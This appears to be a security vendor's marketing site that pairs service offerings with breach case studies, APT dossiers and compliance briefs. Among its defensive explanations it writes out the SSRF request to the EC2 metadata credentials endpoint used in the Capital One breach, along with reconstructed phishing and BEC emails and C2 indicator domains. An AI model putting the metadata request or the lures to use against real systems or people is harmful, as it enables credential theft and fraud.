vCISO writes the controls Hayaiti doesn't directly cover and tracks them to closure

controls mapped across 5 frameworks

subscription required

Annex A controls in ISO/IEC 27001:2022

3/31/25

PCI DSS 4.0.1 hard deadline

VERTICAL BRIEFS · REGULATED SECTOR PRECEDENT

Your regulator wrote
this brief before we did.

Healthcare. Financial services. Retail. Legal. Four verticals where a single incident can trigger criminal liability, loss of licence, or class-action exposure. Every statute cited is live. Every breach cited is documented. Every Hayaiti line item maps to a specific clause your compliance officer has already read.

Hayaiti / vertical risk brief · SEC_HEALTH

privileged · client-release format

SEC_HEALTH · 1M–5,000 employees · HIPAA-covered entity or BA

The largest breach in history just happened here.

§ 01 · applicable regulations

HIPAA Security Rule

HHS Office for Civil Rights

HITECH Act

HHS / OCR

42 CFR Part 2

SAMHSA (SUD records)

FDA Cybersecurity (510(k))

FDA CDRH

§ 02 · sector precedent

2024

Change Healthcare

$2.457B total; $22M ransom

192.7M individuals — largest PHI breach ever recorded. BlackCat/ALPHV via a Citrix gateway without MFA.

2024

Ascension Health

~5.6M records

Black Basta — months of ambulance-diversion and paper charting across 140 hospitals.

2015

Anthem Inc.

$115M settlement

78.8M individuals — previously the largest PHI breach on record before Change Healthcare.

§ 03 · mandatory controls

Access controls with unique user IDs
45 CFR 164.312(a)(1) — required, not addressable.
Audit logs on all PHI systems (6-year retention)
45 CFR 164.312(b) — OCR asks for these first.
PHI encryption at rest and in transit
HITECH safe-harbor from breach notification.
Business Associate Agreements on every vendor
45 CFR 164.504(e) — Change Healthcare's chain broke here.
Documented risk analysis (annual)
OCR's most common enforcement finding.

§ 04 · how Hayaiti fits this vertical

vCISO for HIPAA risk analysis + BAA inventory
Managed EDR on clinical endpoints with 24/7 SOC
Phishing Sim tuned to healthcare lures (EHR password resets)
Ransomware Readiness with clinical-downtime tabletop

engagement starts with a free 15-minute audit call

Book health briefing

192.7M

Change Healthcare records

$575M

Equifax FTC settlement

$18.5M

Target multistate PCI

$42M

Grubman Shire demand

CYBER INSURANCE · 2025 UNDERWRITER QUESTIONNAIRE

Your insurer already has
the questions. Here they are.

Every one of these control requirements is lifted straight from the 2025 application forms of Beazley, Coalition, Chubb, At-Bay, Marsh and Aon. Answer honestly — this page doesn’t phone home, doesn’t save your results, and will tell you exactly which Hayaiti service closes each gap before your renewal hits.

sns / cyber insurance self-audit · 2025 questionnaire

Will your carrier approve you this year?

underwriter verdict

answer below to score

/ 100

The single highest-weight section on every 2025 application. A 'no' to any of these will either deny cover or double your premium.

CAT_01.01· insurer question

Is phishing-resistant MFA enforced on all email, VPN, RDP and admin consoles?

SMS OTPs no longer count with most carriers. Beazley, Coalition and At-Bay now ask explicitly about authenticator apps, FIDO2 tokens or Windows Hello.

Hayaiti · Managed EDR + 24/7 SOCHayaiti · vCISO policy pack

CAT_01.02· insurer question

Do you enforce unique privileged accounts separated from daily-use accounts?

Tier-0 / tier-1 admin separation. Local admin rights removed from standard user accounts. Applies to Active Directory, Azure AD / Entra ID, and SaaS.

Hayaiti · vCISO policy packHayaiti · Ransomware Readiness Assessment

CAT_01.03· insurer question

Is SSO + conditional access deployed for all cloud applications?

Insurers specifically ask about Microsoft 365 / Google Workspace hardening baselines (CISA SCuBA, CIS Benchmarks).

Hayaiti · Managed EDR + 24/7 SOCHayaiti · vCISO

covered

partial

missing

unanswered

questions sourced from: Beazley · Coalition · Chubb · At-Bay · Marsh · Aon

Get the audit report

real control checks

control categories

+35%

premium hit if partial

phone-homes from this page

NATION-STATE DOSSIERS · TLP:CLEAR

Six governments.
One of them already has your credentials.

These aren’t the threat actors attacking some multinational on the news — these are the six most active state-sponsored groups whose malware, phishing lures, and SOHO-router botnets are already touching SMBs in your sector. Real indictments, real MITRE ATT&CK IDs, real operations. Nothing dramatized.

TLP:CLEAR // EYES: INDUSTRY

DOC: DOSSIER_NS_001PAGE 1/1Hayaiti-INTEL-DIV

NATION-STATE THREAT ACTORACTIVE SINCE 2008

APT29

a.k.a. Cozy Bear·a.k.a. Midnight Blizzard·a.k.a. NOBELIUM·a.k.a. The Dukes

CISA · CONFIRMED

NCSC-UK · CONFIRMED

Microsoft MSTIC · CONFIRMED

Sponsor

SVR (Foreign Intelligence Service)

Origin

Russian Federation

Motive

Long-dwell espionage, diplomatic & cloud supply chain

§ 01 · primary targets

US federal agencies
NATO diplomatic missions
Microsoft / software vendors
Think tanks & policy orgs

§ 02 · signature ttps · mitre att&ck

T1078.004Valid Accounts: Cloud
T1606.002SAML token forgery
T1199Trusted Relationship
T1550.001Pass the Hash / Token

§ 03 · known malware families & tools

WELLMESSWELLMAILSUNBURSTTEARDROPGoldMaxGoldFinderMagicWeb

§ 04 · notable operations

2020

SolarWinds Orion

SUNBURST supply-chain, 18K orgs downstream

2023

Microsoft corporate email

Midnight Blizzard OAuth abuse, senior exec inboxes exfiltrated

2015

US Democratic National Committee

Initial access — separate from GRU/APT28 intrusion

§ 05 · public indictments / sanctions

2021

US Treasury OFAC — Sanctions on SVR for SolarWinds (EO 14024)

PRIMARY SOURCES · CISA · DOJ · MANDIANT · MICROSOFT MSTIC

END OF DOCUMENT

tracked actors

27+

DOJ indictments cited

$3B+

Lazarus crypto theft

2008

earliest dossier (APT29)

SERVICES · FULL CATALOG · 2025-Q4

More than a scan.
Every service your insurer will ask about.

Free external scan. Continuous monitoring. 24/7 managed SOC. Incident-response retainer. Fractional CISO. Ransomware readiness. Phishing simulation. All priced for businesses that don’t have seven-figure security budgets — and all delivered by the same analyst from first scan to post-breach forensic report.

Hayaiti / services index · the full ladder

Seven ways we get called. One way we answer.

Not every SMB needs a SOC. Not every startup needs a vCISO. Here’s the full catalog — priced honestly, scoped narrowly, and none of it is the “give us $250K or we can’t help” conversation.

pricing effective 2025-Q4

● all inclusive · no feature gating

MAN_EDR_SOC · TIER 03

Managed EDR + 24/7 SOC

Real analysts, real triage, real containment. Not a dashboard — a team.

Cadence

24 / 7 / 365

Delivery

SOC ticketing, MTTR SLA, quarterly report

Ideal for

Regulated SMBs, MSPs reselling security, firms that can't hire a SOC

what’s included

EDR agent (SentinelOne or Defender-backed)
24/7 analyst monitoring with 15-min MTTR SLA on critical alerts
Ransomware rollback + isolation on detection
Identity-threat detection for Microsoft 365 / Google Workspace
Monthly kill-chain review with named analyst

15 min

critical MTTR

24/7

live analyst coverage

Talk to a SOC lead

ref:Alternative to Huntress Managed Security Platform.

All tiers include named analystMonth-to-month, no long contractsUpgrade / downgrade any time

need something not listed? → ask us

tiers available

to start scanning

1 hr

IR phone SLA

24/7

SOC coverage

2025 THREAT INTELLIGENCE · PRIMARY SOURCES

Every number on this page
is something a prosecutor could subpoena.

Cybersecurity is sold on fear. We sell it on citations. These are the 2025 figures your board will be handed by whatever auditor, insurer, or regulator shows up after the incident. Verizon DBIR, IBM Cost of a Data Breach, Sophos State of Ransomware, FBI IC3, Chainalysis, CISA KEV. Click a lens and read the footnotes — we dare you to find softer numbers.

Hayaiti / threat-intel briefing · fiscal year 2025

The Numbers That Make a CFO Sign Your Quote.

Primary-source figures from Verizon DBIR, IBM/Ponemon, Sophos, FBI IC3, Chainalysis and CISA. No vendor-sponsored surveys, no “industry estimates,” nothing you can’t cite back to us.

LIVE · verified 2025-Q4

LENS_01 · ransomware

Fewer payers. Bigger hits. SMBs in the crosshairs.

LENS_01 / R1

▲ +70% over 2 yrs

Average SMB ransomware recovery

Businesses with 100–250 employees. Up from $375K in 2023.

Sophos · 2025

LENS_01 / R2

▲ record high

YoY rise in claimed ransomware victims

The most active year on record. Attackers shifted to small & mid-sized businesses.

Chainalysis · 2025

LENS_01 / R3

▼ −28 pts since 2022

Of victims now pay the ransom

All-time low. Down from 56% in 2022. Better backups, refusal to negotiate, DOJ disruption ops.

Chainalysis · 2025Sophos · 2025

LENS_01 / R4

▼ −8% paid, +368% median

$0M

On-chain ransom payments, 2025

Down 8% YoY. Median individual payment grew 368% — payers are being squeezed harder.

Chainalysis · 2025

cited sources · ransomware

Sophos — State of Ransomware 2025(2025)

“Mean recovery cost $1.53M (down 44%). SMBs with 100–250 employees averaged $638,536 in recovery. 49% paid the ransom (down from 56%).”

Chainalysis — Crypto Crime Report 2026(2025)

“Ransomware payments fell to ~$820M. Claimed victims up 50% YoY — the most active year on record. Attackers pivoted to small and mid-sized businesses.”

$638K

SMB recovery (Sophos)

$10.22M

US breach avg (IBM)

30%

via 3rd-party (DBIR)

+50%

ransomware victims (Chainalysis)

BEC · WIRE FRAUD · EMAIL AUTOPSY

$122 million.
Stolen with one typo in a domain name.

Evaldas Rimasauskas registered a Latvian shell company called “Quanta Computer Inc” and emailed fake invoices to Google and Facebook AP for two years. Both paid. FACC’s CEO and CFO were fired after a junior accounting clerk wired €42 million based on a “fake president” email. Six real BEC cases, with the actual spoofed emails, the red flags, the wire timelines, and the convictions. None of them needed malware.

BEC / GOOGLE-FB.EML · 2013-2015 · Vendor impersonation

LOSS: $122M combined ($98M FB + $23M Google)

Loss

$122M combined ($98M FB + $23M Google)

Recovered

~$49.7M returned after Rimasauskas arrest

Perpetrator

Evaldas Rimasauskas (Lithuania)

Outcome

5 years federal prison, $26.5M forfeiture, deported 2021

/inbox · unread · flagged by SEG after-the-fact

2014-08-14 09:04 UTC

From:

billing@quanta-computer.com

return-path: billing@quanta-computer.lt (Latvia-registered lookalike)

To:

ap@google.com

Subject:

Quanta Invoice #QCI-2014-10387 — NET 30

Dear Accounts Payable,

Please find attached Quanta Computer Inc. invoice

#QCI-2014-10387 for hardware services rendered during

Q3 2014 in accordance with our master agreement.

Please remit USD 4,178,412.00 via wire to the account

below within NET 30 terms:

Beneficiary: Quanta Computer Inc.

Bank: [Latvian bank] (SWIFT: —)

IBAN: LV__ ____ ____ ____ ____

Ref: QCI-2014-10387

Regards,

Quanta AR Team

RED FLAG 1/3

“billing@quanta-computer.com” — Domain registered in Latvia, not Taiwan — real Quanta domain is quantatw.com

/lesson.learned

Vendor master data validation: always verify a new banking/IBAN change out-of-band with a known contact. Never change wire destinations based solely on an emailed request.

/playbook

Vendor impersonation (Quanta Computer)

/wire.timeline

2013

Rimasauskas registers "Quanta Computer Incorporated" in Latvia

2013

Opens Latvian + Cypriot bank accounts for the shell

2013-2015

Sends fabricated invoices to Google + Facebook AP over 2 years

2015

FB wires ~$98M, Google wires ~$23M, both believe Quanta legitimate

2017-03

DOJ indicts Rimasauskas, Lithuania arrests

2019-12

Sentenced to 5 years + $26.5M forfeiture

2021

Deported back to Lithuania after US prison time

/ref

DOJ SDNY indictment 2017, sentencing memo 2019

$122M

Google + Facebook loss

€70M

Crelan Bank loss

execs fired at FACC

$50B+

FBI IC3 BEC losses to date

IDENTITY · MFA FATIGUE / AITM / SESSION HIJACK

They didn’t crack your password.
They made your help desk reset it.

Uber took 75 minutes from Duo-bomb-plus-WhatsApp to full admin. MGM took 10 minutes from a help-desk phone call to a golden ticket. Snowflake lost 780M records to 2020-era infostealer logs because nobody rotated passwords. Six real identity-first breaches, traced node by node from the phish to the objective. None of them needed a zero-day.

IDENTITY-CHAIN / UBER.IDP · 2022-09-15

T1078 · T1621 · T1556.006 · T1135 · T1552.001

Actor

LAPSUS$ affiliate

@teapotuberhacker

Identity Provider

Duo Push

Duo Push + VPN

Time to Compromise

<4 hours to full admin

Step

0 / 5

/identity.chain.svg

6 nodes · 5 hops

◉VICTIM

◎IDP

✖ATTACK

◈TOKEN

▣SERVICE

▼OBJECTIVE

/narrative

An 18-year-old Lapsus$ affiliate bought an Uber EXT contractor's password from a Genesis Market-style stealer log. On first VPN login, Duo Push challenged. The attacker bombed Duo for over an hour, then messaged the contractor on WhatsApp impersonating Uber IT: "To stop the notifications, please approve it." Contractor approved. Once inside corp network, the attacker found a Powershell script on an open SMB share containing hardcoded Thycotic PAM admin credentials — pivoting from VPN-level access to god-mode.

/attack.stages

T+0m

Attacker buys contractor's creds from stealer log

T+5m

T+10m

Attacker bombs Duo Push for 1+ hour

T+70m

WhatsApp message impersonating Uber IT

T+75m

Contractor approves to stop notifications

T+90m

Enum of internal network, finds SMB share

T+120m

Reads PowerShell with PAM creds

T+180m

Full admin — posts in #eng-security Slack

/impact

Full access to Slack, vSphere, AWS, GCP, SentinelOne, HackerOne. Internal Slack message: "I announce I am a hacker and Uber has suffered a data breach."

/ref

Uber security update 2022-09-16 + Mandiant writeup

10 min

MGM help desk → admin

75 min

Uber MFA bomb → admin

163

0ktapus Twilio tenants

zero-days required

SUPPLY CHAIN · COMPROMISE AUTOPSY

The attacker didn’t breach you.
They breached the person you trust.

“Jia Tan” spent two years submitting legitimate patches before shipping the XZ backdoor. SUNSPOT rewrote SolarWinds binaries at compile time so developers never saw the code. A single curl | bash in your CI leaked every secret to an attacker for eleven weeks. Six real upstream compromises, dissected line-by-line: the actual diffs, the trust-building timelines, the social engineering playbooks.

SUPPLY-CHAIN / XZ.FORENSICS · 2024 · GitHub / liblzma (C)

T1195.002 · T1554 · T1554.001 · T1505.003

Discovered

2024-03-29

Undetected

~2 years of trust-building, ~1 month in release

Blast Radius

Would have backdoored every sshd on Debian sid / Fedora 41 / openSUSE Tumbleweed

Ecosystem

GitHub / liblzma (C)

8 stages

2021-10

benign

JiaT75 account created

First GitHub activity — benign commits to libarchive / xz

2022-06

benign

First xz contribution

Legitimate CRC speedup PR merged — establishes credibility

2022-06

warn

Sockpuppet pressure begins

"Jigar Kumar" starts public pressure on mailing list: 'Your maintainer has been unresponsive for weeks'

2023-03

warn

Co-maintainer rights granted

Lasse Collin (burned out, mental health issues publicly disclosed) adds JiaT75 as maintainer

2023-06

crit

OSS-Fuzz disabled for xz

JiaT75 files issue to disable ifunc fuzzing — the exact mechanism he later weaponized

2024-02-23

crit

v5.6.0 released

Backdoor lands. Stage 1 hidden in m4 build glue, stage 2 in test fixture

2024-03-09

crit

v5.6.1 released

Second variant — more evasive, activates only under specific glibc + systemd + sshd chain

2024-03-29

crit

Andres Freund posts to oss-security

Postgres dev noticed 500ms sshd slowdown + Valgrind errors during benchmarks → traced to liblzma → global incident

/root-cause

A threat actor using the persona "Jia Tan" (JiaT75) spent ~2 years building reputation, took over maintainership from the burned-out original author Lasse Collin, and landed a multi-stage backdoor hidden inside test fixture .xz files. The M4 build glue detected release tarballs and replaced a valid IFUNC resolver with one that diverted sshd's RSA_public_decrypt to attacker code, giving pre-auth RCE on any ssh daemon linked against liblzma via systemd.

/social.playbook

Create GitHub account → submit legitimate patches for 2yrs → pressure campaign from sockpuppets (Jigar Kumar, Dennis Ens) demanding faster releases → original maintainer burns out → hand-off to Jia Tan → establish trust → land backdoor in v5.6.0

/headline.victims

▸Debian unstable
▸Fedora Rawhide / 40 beta
▸openSUSE Tumbleweed
▸Kali Rolling
▸Arch (build only)

/remediation

Downgrade to xz 5.4.x. Debian/Fedora pulled 5.6.x within hours. CISA issued alert. Every distro now audits maintainer handoffs and runs differential fuzz on release tarballs vs git HEAD.

2 yrs

XZ maintainer prep

14 mo

SUNBURST dwell

18K

Orion customers hit

600K

3CX businesses exposed

CLOUD · BLAST-RADIUS MAP

One S3 bucket left public.
560 million records gone in 72 hours.

Cloud breaches don't happen at the perimeter anymore — they happen at the IAM role, the SAS token, the forgotten debug snapshot, the GitHub-committed secret. Six real cloud incidents below, each traced node-by-node from initial misconfig to final exfil: Capital One’s SSRF→IMDSv1→role chain, Storm-0558’s stolen signing key, Snowflake’s infostealer harvest, Toyota’s decade-old committed credentials. Watch the blast radius expand in real time.

cloud-blast / capitalone.graph · 2019 · step 1/8

T1190 · T1552.005 · T1078.004 · T1530

BLAST RADIUS

8 nodes

RECORDS EXPOSED

106M customer records

TIME TO EXFIL

~4 months silent

ACTOR

Paige Thompson (ex-AWS, 'erratic')

/cloud-graph.svg

force-directed · 8 nodes · 7 edges

◆

ACTOR

◉

IAM

▣

COMPUTE

▤

STORAGE

⬡

NETWORK

◈

SECRET

▼

EXFIL

/incident.dossier

Capital One S3 breach

Capital One · 2019

ROOT CAUSE

Misconfigured ModSecurity WAF rule on EC2 instance allowed SSRF to EC2 instance metadata endpoint (IMDSv1). Stolen IAM role had overly broad S3 ListBucket permissions.

IMPACT

106 million customers (100M US + 6M Canada), 140,000 SSNs, 80,000 linked bank account numbers, 1 million Canadian Social Insurance Numbers exposed. $190M class action settlement, $80M OCC civil penalty.

/kill-chain.log

WAF misconfig enables SSRF

Modified ModSecurity rule trusted client-supplied headers, allowing Thompson to proxy arbitrary HTTP requests through the WAF.

IMDSv1 credential theft

SSRF to http://169.254.169.254/latest/meta-data/iam/security-credentials/*-WAF-Role returned temporary credentials. IMDSv2 was not enforced.

S3 bucket enumeration + sync

With WAF role STS creds, Thompson listed 700+ buckets and aws-s3-synced ~30GB of customer data, including 140K SSNs and 80K linked bank account numbers.

Public bragging exposed the crime

Thompson posted in Slack and GitHub about the dump. A third party saw it and reported to Capital One July 17, 2019 — 4 months after exfiltration.

/remediation.txt

Enforce IMDSv2 cluster-wide. Apply least-privilege IAM roles (no ListAllMyBuckets on WAF roles). Enable GuardDuty S3 protection + CloudTrail data events. Restrict WAF to strict SSRF filter rules. $190M settlement + $80M OCC fine.

real incidents

780M+

records exfil'd

zero-day CVEs

IAM

was the blast door

DNS / C2 · BEACON MONITOR

Your DNS logs have the answer.
You just need to ask the right question.

Every C2 framework beacons home. SUNBURST waited 14 days then queried base32-encoded subdomains of avsvmcloud[.]com. Cobalt Strike requests /jquery-3.3.1.min.js every 60 seconds like clockwork. Turla sleeps 4 hours between calls to compromised WordPress sites. Six real C2 patterns below, decoded from public threat intel, streaming through a live packet capture so you can see what blended-in traffic actually looks like when you know what to watch for.

dns-monitor / capture.pcap · iface eth0 · rx 0 pps

LIVE

PACKETS / SEC

ANOMALY SCORE

63/100

CAMPAIGN

SUNBURST

MITRE ATT&CK

T1568.002 · T1071.004 · T1095

/live-capture.feed

0 visible · rolling buffer 18

TIME

SRC

QUERY

TYPE

BYTES

TIMING

ENTROPY

VOLUME

REPUTATION

/campaign.dossier

2020

SUNBURST

APT29 / NOBELIUM (SVR)

SolarWinds Orion hosts queried avsvmcloud[.]com subdomains that were base32-encoded representations of victim environment fingerprints. 12-14 day silent install window defeated behavioral monitoring before C2 activation. 18,000 orgs installed the backdoor; ~100 were selected for active exploitation.

TECHNIQUE

DGA subdomain beaconing + dormancy

JITTER

~dormant 12-14d, then 1-60min jitter

/decoded-payload.txt

Encoded domain = base32(userID || hostname_hash) — 32-byte XORed against static key, collision-free per target to route to killswitch/step-up C2

/iocs.list

avsvmcloud[.]comdeftsecurity[.]comfreescanonline[.]comdigitalcollege[.]orgvirtualdataserver[.]com

documented C2 frameworks

14d

SUNBURST dormant period

T1071.004

MITRE DNS tunneling

63B

RFC 1035 subdomain limit

ZERO-DAY · DISCLOSURE RACE

The patch existed for 4 hours.
The attacker had it for 2 months.

Every CVE has two clocks. The one defenders watch starts at public disclosure. The one attackers actually race started months earlier — when an unknown group discovered the bug and started exploiting it silently. Six real CVEs below, each rendered as a timeline showing exactly how much runway the attacker had before anyone knew to look. In every case the silent window was longer than the remediation window.

landmark CVEs profiled

60d

max silent exploitation window

60K+

orgs hit by ProxyLogon chain

93M+

individuals exposed by MOVEit

INSIDER THREAT · BEHAVIORAL RADAR

The threat already has the badge.
It's been on payroll for 3 years.

60% of organizations experienced an insider incident in the last twelve months. Median dwell time before discovery: 77 days. Average cost: $15.4 million. The perimeter never mattered — these subjects passed background checks, cleared interviews, and used legitimate credentials. Six real case studies below, each rendered as an 8-week behavioral heatmap: the patterns that were visible weeks before the loss event, and the monitoring that wasn't looking.

insider-radar / snowden.dossier · w-1 · IDEOLOGUE

2013

60%

orgs hit by insider

$15.4M

avg incident cost

77d

median dwell

27%

fraud-driven

49/100

current risk score

/behavioral-heatmap.grid

8 weeks · 8 indicators · 64 cells

INDICATOR

W-8

W-7

W-6

W-5

W-4

W-3

W-2

W-1

FILE.PULL

Classified file pulls

CRED.BORROW

Peer credential use

USB.WRITE

Removable media writes

OFF.HRS

Off-hours console activity

REPO.ACCESS

Cross-compartment repo reads

TRAVEL.REQ

Personal travel requests

PRINT.VOL

Print volume

EMAIL.EXT

External email contacts

DETECTION →

SEVERITY

score · 49

/dossier.txt

IDEOLOGUE

Edward Snowden

Infrastructure Analyst (contractor, Booz Allen) · NSA / Hawaii facility (2013)

Ideological objection to mass surveillance programs. Deliberate exfiltration through legitimate sysadmin access and borrowed credentials from ~25 colleagues.

TENURE

DWELL

~3 months

DETECTED

W-1

/impact.log

DAMAGE

1.5M+ classified documents exfiltrated

TRIGGER EVENT

Discovery of PRISM program internals; requested transfer to Hawaii specifically to gain BOUNDLESSINFORMANT access.

OUTCOME

Global disclosure · ongoing asylum · reform of §215

/missed-intervention.alert

Privileged user activity monitoring was absent on the Hawaii infrastructure. Credential sharing by peers went unreviewed. No DLP on removable media for sysadmin role.

60%

of orgs hit by insider threat (2024)

77d

median dwell before discovery

$15.4M

avg annual insider-risk cost

real insider incidents profiled

RANSOMWARE · KILL CHAIN TIMELINE

By the time you see the ransom note,
they've been inside for 23 days.

Ransomware is not a smash-and-grab. The median dwell time between initial access and encryption in 2024 was 23.3 days — nearly a month of attackers moving through your network, enumerating Active Directory, harvesting credentials, exfiltrating data, and positioning the payload. Every one of those phases leaves artifacts and detection opportunities you missed. Five real incidents below, traced from T-0 login to ransom note.

ransomware ~ /killchain/colonial.timeline

T+0d · INITIAL ACCESS

CASE STUDIES

real incidents

AVG DWELL TIME

23.3d

before encryption

GLOBAL COST 2023

$20.3B

Chainalysis

DETECT WINDOW

72h

to catch initial

AVG DEMAND

$2.3M

per Sophos 2024

ATTACK TIMELINE · 6 DAYS · DWELL 5d

Colonial Pipeline Co.

ACTIVE PHASE · T+0d

INITIAL ACCESS

MITRE T1078

Inactive VPN login

TECHNIQUE

Valid accounts · legacy VPN no MFA

ATTACKER TOOL

Reused password from breach dump

ARTIFACT LEFT

VPN auth log (no anomaly flag)

DETECTION OPPORTUNITY

MFA enforcement; detect disabled-user auth success; detect login from new geo

INCIDENT DOSSIER

Colonial Pipeline / DarkSide

Critical Infrastructure · Energy

THREAT ACTOR

DarkSide RaaS

Family: DarkSide

INITIAL ACCESS VECTOR

Inactive VPN account, reused password, no MFA

RANSOM DEMAND

75 BTC (~$4.4M)

PAID

$4.4M (most recovered later by DOJ)

IMPACT

5,500-mile pipeline shut down 5 days. East Coast fuel shortages. Declared national emergency. Gas prices spiked. First cyber incident to halt U.S. fuel distribution at scale.

NARRATIVE

DarkSide affiliate logged into a single VPN account that belonged to an inactive employee. The password appeared in a dark web breach data dump — reused on the Colonial VPN. No MFA was enforced on that VPN. The attacker had a week of undetected access before deploying ransomware on the business IT network. Colonial shut down the operational pipeline preemptively for safety (not because the OT was encrypted). CEO authorized $4.4M BTC payment within hours.

phase 1/8 · T+0d

initial access → persistence → discovery → lateral → staging → exfil → encrypt → ransom

auto ON

nation-scale ransomware case studies

23.3d

median dwell time 2024 (Sophos)

$20.3B

global ransomware payments 2023

72h

window to catch initial access

MFA BYPASS · ATTACKER PLAYBOOK

Your MFA isn't a wall.
It's a door with six keys.

81% of M365 breach victims in 2023 had MFA enabled. Turning on MFA is not the finish line — it's the starting line. Attackers developed an entire bypass playbook: spam prompts until fatigue, proxy the login in real time, swap the SIM, steal the cookie after login, call the help desk to reset everything, or quietly install a browser extension with full read access. Here are the six most common bypass techniques, each paired with the real incident that proved them.

mfa-bypass ~ /catalog/push_fatigue.attack

STEP 1/4

BYPASS METHODS

documented

M365 BREACHES 2023

81%

had MFA enabled

MGM LOSSES

$100M+

10-min vishing call

STEALER LOGS

100K+

sold weekly

FIDO2 STOPS

4/6

of these methods

ATTACK FLOW · MFA BOMBING

Push Notification Fatigue

“Spam the victim until they tap 'Approve' just to make it stop.”

◆ ATTACKER

Credentials obtained

Attacker buys stolen Uber contractor username+password from Genesis Market or similar stealer log broker.

WHY IT WORKS · MECHANISM

Push-based MFA has no per-prompt rate limit on many deployments. The victim experiences alert fatigue and either taps through or believes the attacker's pretext.

DIFFICULTY

TRIVIAL

success rate: ~33% within first 100 prompts

REAL CASE STUDY

Uber Technologies

Lapsus$ (18-year-old Brazilian-English threat actor 'teapot') · Sept 15, 2022

IMPACT: Full AWS + GCP admin, Slack, HackerOne, internal tooling compromised. Private stock issuance info stolen.

Attacker obtained a contractor's corporate credentials from a dark web marketplace. Spammed the contractor's Duo MFA with 100+ push prompts over an hour. Messaged contractor on WhatsApp posing as Uber IT: 'Accept this so you can log back in.' Contractor tapped approve out of sheer annoyance. Attacker then pivoted to PAM via PowerShell script containing hard-coded admin creds.

BYPASSES

× SMS OTP

× Push approve

× TOTP (if socially engineered)

× Voice callback

STOPPED BY

✓ Number matching

✓ FIDO2 / WebAuthn

✓ Hardware security key

COUNTERMEASURE

Number-matching MFA (show a 2-digit code on the login screen that must be typed into the push app) + rate limiting + require re-auth after N rejected prompts. FIDO2 hardware keys fully eliminate it.

technique 1/6 · step 1/4

Your MFA is only as strong as its recovery flow

auto ON

documented bypass techniques

81%

of M365 breaches had MFA on

$100M

MGM loss from one vishing call

4/6

methods FIDO2 hardware keys stop

SUPPLY CHAIN · CASCADE FORENSICS

The attack didn't come from outside.
It came from your dependencies.

When SolarWinds pushed the update, 18,000 organizations installed the backdoor THEMSELVES. When Log4j logged a string, three billion devices became remotely executable. The modern breach doesn't kick in your door — it walks in through software you trusted, signed by certificates you verified, distributed by vendors you paid. Five real cascades below, traced from upstream injection to downstream blast.

supply-chain ~ /var/cascades/solarwinds.trace

RECON · STEP 1/5

INCIDENTS

case studies

GLOBAL COST

$100B+

SolarWinds alone

MOVEIT VICTIMS

2,700+

95M individuals

SOLARWINDS REACH

18K

orgs trojanized

SUNBURST DWELL

280d

before discovery

DEPENDENCY CASCADE · SOLARWINDS CORP

Orion Platform · v2019.4 HF5 — v2020.2.1 HF1

RECON

INJECT

PACKAGE

DISTRIBUTE

EXECUTE

CASCADE PROGRESSION20%

Sep 2019 · RECON

Initial access to SolarWinds dev network

APT29 spear-phished a SolarWinds employee, gained foothold on dev workstation, then pivoted to internal Azure tenant + on-prem build infrastructure.

INCIDENT DOSSIER

SolarWinds Sunburst

9 months undetected

ATTRIBUTED ACTOR

APT29 / Cozy Bear

Russian SVR (Foreign Intelligence)

PAYLOAD

SUNBURST backdoor (SolarWinds.Orion.Core.BusinessLayer.dll)

C2 to avsvmcloud[.]com via DGA, dormant 12-14 days, exfil via DNS

CVE-2020-10148

PACKAGE TYPE

Signed MSI update (digital cert valid)

IMPACT REACH

~18,000 orgs downloaded · ~100 actively exploited

DISCOVERY

FireEye (Mandiant) · Dec 8, 2020

NOTABLE VICTIMS · 6

U.S. Treasury

Email mailbox theft (senior leadership)

Federal

U.S. State Dept

Mailbox compromise

Federal

DHS / CISA

Email + internal docs accessed

Federal

Microsoft

Source code repos viewed

Tech

FireEye / Mandiant

Red team tools stolen

Security

NTIA, Commerce, NIH

Multi-agency mailbox theft

Federal

ROOT CAUSE

Build server lacked SBOM verification, code-signing was automated without diff review, and dev workstation segmentation was insufficient — SUNSPOT could observe MsBuild and inject mid-compile invisibly.

ESTIMATED COST

$100B+ global cleanup (Senate Intelligence Comm. estimate)

stage 1/5 · phase RECON

actor → vendor → build → release → 18,000 victims

auto ON

18K

orgs trojanized via SolarWinds Orion

2,700+

victims of the MOVEit Transfer 0day

$100B+

estimated SolarWinds cleanup cost

8 yr

Log4Shell sat dormant in production

CREDENTIAL STUFFING · COMBOLIST ENGINE

15 billion passwords are already public.
Your users reused one of them.

Credential stuffing is embarrassingly cheap. A threat actor downloads a breach combolist, rents a residential proxy network for $20/hour, and throws 100,000 email-password pairs at your login page. The success rate is only 0.1-2% — but at global scale, 0.1% is a catastrophe. Below: five real incidents, the combolists they used, and the live math.

6.9M

23andMe records via DNA Relatives

34,942

PayPal accounts taken over in 48h

$300K

DraftKings wallets drained

99.9%

MFA prevents stuffing takeover

CLOUD POSTURE · MISCONFIG CASCADE

The breach isn’t the hack.
It’s the setting you forgot to flip.

Nearly every catastrophic cloud breach of the last decade traces back to a single checkbox, a wildcarded IAM role, a SAS token with the wrong scope, or a developer push that made a private repo public. Below: five real cascades, the architecture diagrams that explain them, and exactly which setting the attacker walked through.

82%

of cloud breaches involve misconfig

$4.45M

IBM avg cost of a cloud breach

106M

records in Capital One cascade

38TB

Microsoft SAS token public 2 yrs

EMAIL FORENSICS · HEADER AUTOPSY

91% of breaches start in the inbox.
Here’s what the autopsy actually finds.

We pulled five real phishing campaigns from public incident reports — from the 0ktapus crew that breached Twilio, to a GRU spear-phish dressed up as a UN aid report, to a CEO BEC wire scam that cleared offshore in hours. Each one is dissected the way an incident responder reads it: envelope, auth headers, body psychology, payload, attribution.

phish-forensics ~ /var/quarantine/eml/scatter_twilio.eml

MIME PARSER · HEADER FORENSICS · KIT FINGERPRINTING

CASE FILES

FORENSIC FINDINGS

CRITICAL FLAGS

96%

AVG CONFIDENCE

ATT&CK

MITRE TTPs MAPPED

— ENVELOPE —

From:

Twilio IT Helpdesk <itsupport@twilio-sso.help>

To:

engineer@twilio.com

Subject:

[ACTION REQUIRED] Schedule change — re-authenticate Okta within 24h

Date:

Thu, 04 Aug 2022 07:14:22 +0000

Reply-To:

no-reply@twilio-sso.help

Msg-ID:

<20220804071422.91A2E.itsupport@twilio-sso.help>

AUTH:

spf=PASS

dkim=PASS

dmarc=PASS

— BODY —

Hi —

Twilio IT has rolled out an updated work schedule. As part of the rollout,

↑ social-engineering pretext

all engineering staff are required to re-authenticate to the Okta SSO portal

within 24 hours or your account access will be temporarily suspended.

↑ urgency / fear

Please use the link below from your work device:

>> https://twilio-okta.com/schedule <<

↑ look-alike domain — NOT twilio.com

If you have any questions reach out to your IT contact.

Thank you,

↑ no signature, no employee name

Twilio IT

→ HOVER REVEAL

